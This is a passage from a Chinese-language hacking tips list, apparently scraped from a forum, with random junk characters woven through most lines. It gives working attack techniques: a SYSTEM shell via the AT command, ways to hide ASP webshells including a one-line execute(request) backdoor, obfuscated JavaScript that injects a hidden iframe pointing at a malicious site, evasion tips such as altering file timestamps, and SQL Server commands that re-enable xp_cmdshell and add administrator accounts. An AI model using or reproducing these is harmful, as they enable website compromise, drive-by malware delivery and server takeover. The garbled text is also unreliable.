' l! ^) ?. Z; T; i8 m52、at "12:17" /interactive cmd
2 S* X1 @# s- x4 Z; E执行后可以用AT命令查看新加的任务; z9 P. f& K9 b! _% V/ r) C5 N" |
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
6 n+ p: f6 g* z6 {7 h/ m! O6 G* w
; f- x5 F+ g5 G2 ~( O9 ?. R53、隐藏ASP后门的两种方法$ S* x4 T7 i. H8 P- H X
1、建立非标准目录:mkdir images..\: c1 O. z1 M! @+ o& z) N
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp/ o* `/ B7 g: S) B j* k
通过web访问ASP木马:http://ip/images../news.asp?action=login2 f& q. s& N$ k* D6 ^' r
如何删除非标准目录:rmdir images..\ /s. _: K- W4 n1 L8 b! E" y
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
* s( y9 b! C9 R+ umkdir programme.asp
8 ~4 D- t% |5 W0 ~# k新建1.txt文件内容:<!--#include file=”12.jpg”-->
2 h8 `- V2 c0 ]% u+ X d新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件+ ?+ R9 m& A3 ^
attrib +H +S programme.asp7 o5 _7 I y- W3 z
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt+ [+ W" j3 |! [! [. `/ i
( N& F$ o$ t, G! E- I, Q: r6 j54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
" B s9 n/ X. O4 K; R% [然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。4 ?( V# Z! ?7 K# I! L# U
- b) C1 {+ y! Y1 E
55、JS隐蔽挂马
! `+ e1 N( _; y- ?' M* T# V% y1./ r# H, [( Y6 M7 H/ `% t
var tr4c3="<iframe src=ht";
2 K) W4 x) s+ R5 X9 Qtr4c3 = tr4c3+"tp:/";/ E, \2 ~9 {+ Z) ]1 H5 ~
tr4c3 = tr4c3+"/ww";6 S' F1 k( Z) o) l& J- J/ j
tr4c3 = tr4c3+"w.tr4";$ S( S" `$ j+ f& A
tr4c3 = tr4c3+"c3.com/inc/m";5 z- s7 Y/ r- z) U9 _
tr4c3 = tr4c3+"m.htm style="display:none"></i";
5 h; X. N' z9 c$ a+ ~1 Atr4c3 =tr4c3+"frame>'";# C# y1 g7 |& o. p; m. c, s0 p
document.write(tr4c3);
. V: i% e5 t+ b1 n避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
0 F! K" o# G9 C. B
5 a! r" G* A! X& e9 T2." {) k9 ~& J' A1 `, N
转换进制,然后用EVAL执行。如
7 @0 g) u7 {; V4 ~eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");$ j5 j) S0 e0 M" Q
不过这个有点显眼。
$ X, U- D. w; B" F2 f# N# @3., r; u9 ^) o* j) c3 o5 J
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');" r; F5 s$ T9 S9 r1 m$ K
最后一点,别忘了把文件的时间也修改下。# D# y1 R0 t x: S7 {* W2 X
( _& k/ J+ |7 D8 W3 V; E- y x
56.3389终端入侵常用DOS命令3 ^' `' U5 w6 K
taskkill taskkill /PID 1248 /t2 w9 g/ A! I3 B! m
. ]" L1 p0 O! B7 z+ h
tasklist 查进程8 G' S1 X/ Q. a3 Q8 L
& _9 d$ h$ D) E0 _cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限" o X1 g( W" L) W8 O- ]! i+ |
iisreset /reboot
: X* Z; T) @& ]( j# gtsshutdn /reboot /delay:1 重起服务器
* _2 K3 e; f$ G9 B
8 Y* U7 U+ S4 G: B* rlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,5 R2 q6 u+ ]) L% e
( s- P) t2 z! \; X. \query user 查看当前终端用户在线情况
: t; G8 D% q$ F9 |, F. F5 R5 L. I. m- m& z& x+ x; h. N
要显示有关所有会话使用的进程的信息,请键入:query process *
( i% O* j6 w1 i- j$ r0 d
; }+ N7 k; s. j) X+ {" s要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2* L s2 ^1 A: `3 P% d/ O
: f5 o' W6 O9 Q3 F! U2 O
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
0 [) _4 U+ Q& X7 J" s
, c4 t* |/ f6 b' w5 H- |- c要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02- b; ]" R' b* y+ F+ H
/ N$ \& |0 r5 p8 U% K命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启# E* n% B# U: c; I+ \ A. g
- f- c; j5 j# @
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
9 |* c3 p- O2 D% c, G2 S
8 b% L% ~" M. X/ `6 j& o1 K/ u命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。& W' E# F% a4 ^2 R
" U9 B" P$ E6 O6 q R! O$ \命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
~, U3 f6 X4 C0 a5 i% |: p* j( w! E. Q7 u3 @
56、在地址栏或按Ctrl+O,输入:
5 F2 P Y- ~' Q3 R5 V% i( H3 vjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;8 J; Z! V8 S5 H7 B, F$ u
; I: Z, z6 {& {4 J) H源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。8 E1 K2 W( v) q+ Q& E
( d; u" j! i* K- @ ?
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
! l4 e# G; ]2 s用net localgroup administrators是可以看到管理组下,加了$的用户的。
$ F# {% d' l8 R" D) d, j N) F4 W4 _7 D) x. Y: Z
58、 sa弱口令相关命令
7 V; J; ]. g# a5 ~7 l
) ?- n" w) O! n$ ?5 C一.更改sa口令方法:' E3 x- Q2 C+ E/ _6 ]* o
用sql综合利用工具连接后,执行命令:
4 o- F" }* Y# Zexec sp_password NULL,'20001001','sa'* j s1 K, i# O( c8 w8 Y2 Z) {
(提示:慎用!)
% `: k0 {7 ?4 p
4 k, e9 A r- x9 l6 n' v二.简单修补sa弱口令.
1 @5 X0 t6 @% Z) ]. [- J
$ w( R& v" s2 M1 M% M- }) _7 c& M方法1:查询分离器连接后执行:2 ~. |' G! B Y8 n9 R1 L
if exists (select * from
- t5 ~6 v3 K6 }( R5 @4 cdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and- b' \0 e+ R4 }! u0 L
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)& q( k6 Q: t) a0 X; W! A9 V& V
1 P+ a% v3 M% c; s& N$ A, C6 L1 yexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'- l# k0 I8 { I5 t( P
: n- ~ z+ N1 @- n1 j$ _8 @0 s
GO
: {. H, w2 o$ J( t' Z& H" r' d4 ?3 `4 P4 n: G: H. |8 t0 f
然后按F5键命令执行完毕
0 b; ^2 S% Y; S4 k3 x* L) \$ ^" C% e: ?+ w
# F) r8 ~7 m5 N! ^8 n% |# X) N0 Q& X方法2:查询分离器连接后
) N1 L' p. S- C第一步执行:use master0 s( u- E ?: o, R! @
第二步执行:sp_dropextendedproc 'xp_cmdshell'& B( z! d- D5 p; ~! n
然后按F5键命令执行完毕: C1 W! [0 b+ ?8 b- T1 ?) z$ _
0 Q* b" F9 x5 @* C3 r" O, \+ [3 V r. V& Q$ u1 m* H* B
三.常见情况恢复执行xp_cmdshell.
8 O/ t# f- B- y- J+ Q$ e) L( _8 @$ y
/ j4 s1 F/ ^8 s! m: s1 未能找到存储过程'master..xpcmdshell'.
: P& N/ U" X/ g+ W4 u 恢复方法:查询分离器连接后,$ {' k7 r+ U( Y
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
( a' D' W) O5 a" k7 B/ D第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
) u1 I7 y) E8 G然后按F5键命令执行完毕( x! \9 ~: Q8 l# G. P
4 j+ h; F7 r8 _9 W( m% f- E5 {/ C
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
8 M. B" h& \: c; Z; S恢复方法:查询分离器连接后,
8 }1 R1 s! @: {第一步执行:sp_dropextendedproc "xp_cmdshell"
. g/ x4 Q0 Y/ A/ i5 m' [& \; k第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
) L1 k& d7 C) M/ n# ~, w然后按F5键命令执行完毕
2 G2 B# V- G9 v
- V$ n7 X& q: E, W' n) E0 J8 }; k3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
9 d. ?, I9 w( [$ }恢复方法:查询分离器连接后,
0 w$ ^6 A1 ~- L第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
& Z' E" Q5 O7 c$ t$ Y1 J2 C第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
, {1 x9 N; F5 N4 Y然后按F5键命令执行完毕
% w2 h- N5 h0 A8 o N% n7 |: U `" O# Q- g7 r! z; |0 t
四.终极方法." }% v) Z/ Z$ R1 c% C9 M6 J. I3 l* g
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
# R/ `) e4 t4 @1 T+ Q) h7 F( h3 R查询分离器连接后,
0 F/ `0 m+ r7 z# D l2000servser系统:
# B- M6 o" M0 E% I, |+ ]2 x" [declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
* ^5 z) m! S' p4 T
; P; ~ H2 s6 ~9 C/ H/ }declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'; x& f- t0 \4 K9 N
: V( o( k$ `9 r" m2 u* ~% _xp或2003server系统:& Q/ T& G! I; k$ m
% N5 F5 H7 Z1 I% ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'. ^8 Q7 X0 R* J" ]4 x
/ K, {; r3 c8 O. P0 W* W" udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'9 w* L- Y: `3 m. A: G4 z, \
|